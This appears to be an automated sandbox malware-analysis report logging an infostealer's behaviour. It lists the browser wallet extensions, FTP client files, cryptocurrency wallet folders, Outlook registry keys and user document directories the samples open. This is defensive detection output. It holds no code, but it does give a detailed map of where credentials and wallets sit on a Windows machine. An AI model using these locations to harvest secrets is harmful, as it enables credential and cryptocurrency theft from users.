Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
